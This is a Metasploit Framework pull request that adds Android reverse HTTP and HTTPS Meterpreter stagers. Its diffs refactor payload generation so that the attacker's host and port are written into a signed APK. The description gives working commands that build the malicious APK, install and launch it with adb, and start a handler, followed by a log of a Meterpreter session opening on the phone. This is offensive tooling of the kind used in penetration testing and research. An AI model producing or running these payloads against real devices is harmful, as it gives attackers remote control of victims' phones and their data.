### PR TITLE
Android payload reverse_http & reverse_https

### DIFF
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -31,5 +31,9 @@ module Msf::Payload::Dalvik
     [str.length].pack("N") + str
   end
 
+  def string_sub(data, placeholder="", input="")
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+
 end
 

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -35,5 +35,32 @@ module Msf::Payload::Dalvik
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end
 
+  def generate_cert
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+      )
+    key  = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+    return cert, key
+  end
 end
 

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -31,11 +31,10 @@ module Metasploit3
     ], self.class)
   end 
   
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
-  end
-  
   def generate_jar(opts={})
+    u = datastore['LHOST'] ? datastore['LHOST'] : String.new
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32
+    
     jar = Rex::Zip::Jar.new
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -32,15 +32,14 @@ module Metasploit3
   end 
   
   def generate_jar(opts={})
-    u = datastore['LHOST'] ? datastore['LHOST'] : String.new
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32
-    
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
+
     jar = Rex::Zip::Jar.new
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + host + ":" + port)
     string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -1,12 +1,12 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
+require 'msf/core/handler/reverse_http'
 
 module Metasploit3
 
@@ -15,32 +15,32 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'			=> 'Dalvik Reverse TCP Stager',
-      'Description'	=> 'Connect back stager',
-      'Author'		=> 'timwr',
-      'License'		=> MSF_LICENSE,
-      'Platform'		=> 'android',
-      'Arch'			=> ARCH_DALVIK,
-      'Handler'		=> Msf::Handler::ReverseTcp,
-      'Stager'		=> {'Payload' => ""}
-    ))
+      'Name'          => 'Dalvik Reverse HTTP Stager',
+      'Description'   => 'Tunnel communication over HTTP',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttp,
+      'Stager'        => {'Payload' => ""}
+      ))
 
     register_options(
     [
       OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
     ], self.class)
-  end
-
+  end 
+  
   def string_sub(data, placeholder, input)
     data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
   end
-
+  
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
 
-    string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
     string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
@@ -52,7 +52,7 @@ module Metasploit3
       [ "resources.arsc" ]
     ]
 
-    jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 
     x509_name = OpenSSL::X509::Name.parse(
@@ -78,8 +78,7 @@ module Metasploit3
     # requirement. You can not upload an application if it is signed
     # with a key whose validity expires before that date.
     # """
-    # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
-    cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
 
     jar.sign(key, cert, [cert])
 

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -54,31 +54,7 @@ module Metasploit3
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
-
+    cert, key = generate_cert
     jar.sign(key, cert, [cert])
 
     jar

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -37,11 +37,10 @@ module Metasploit3
 
   end
   
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
-  end
-  
   def generate_jar(opts={})
+    u = datastore['LHOST'] ? datastore['LHOST'] : String.new
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32
+
     jar = Rex::Zip::Jar.new
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -25,9 +25,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttps,
       'Stager'        => {'Payload' => ""}
       ))
-    
-  		@class_files = [
-      [ "metasploit", "PayloadTrustManager.class" ],
     ]
 
     register_options(
@@ -60,31 +57,7 @@ module Metasploit3
     jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
     jar.build_manifest
 
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
-
+    cert, key = generate_cert
     jar.sign(key, cert, [cert])
 
     jar

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -25,7 +25,6 @@ module Metasploit3
       'Handler'       => Msf::Handler::ReverseHttps,
       'Stager'        => {'Payload' => ""}
       ))
-    ]
 
     register_options(
     [
@@ -35,15 +34,14 @@ module Metasploit3
   end
   
   def generate_jar(opts={})
-    u = datastore['LHOST'] ? datastore['LHOST'] : String.new
-    raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32
+    host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new
+    port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s
+    raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32
 
     jar = Rex::Zip::Jar.new
 
     classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + host + ":" + port)
     string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -31,10 +31,6 @@ module Metasploit3
     ], self.class)
   end
 
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
-  end
-
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -51,32 +51,7 @@ module Metasploit3
     jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk"))
     jar.build_manifest
 
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
-    cert.not_after = Time.at( 0x78045d81  + rand( 0x7fffffff - 0x78045d81 ))
-
+    cert, key = generate_cert
     jar.sign(key, cert, [cert])
 
     jar


### PR DESCRIPTION
./msfpayload android/meterpreter/reverse_https LHOST=10.0.0.1 R > meterp.apk
adb install meterp.apk
adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
./msfconsole -x "sleep 2; use exploit/multi/handler; set payload android/meterpreter/reverse_http; set LHOST 10.0.0.1; exploit"

[_] Started HTTPS reverse handler on https://0.0.0.0:4444/
[_] Starting the payload handler...
[_] 10.0.0.101:42260 Request received for /RJvF_pamHmO5gqaaSUb5y...
[_] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.101:42260) at 2014-02-26 02:22:58 +0200

meterpreter > sysinfo 
Computer    : localhost
OS          : Linux 3.0.31-302285 (armv7l)
Meterpreter : java/java
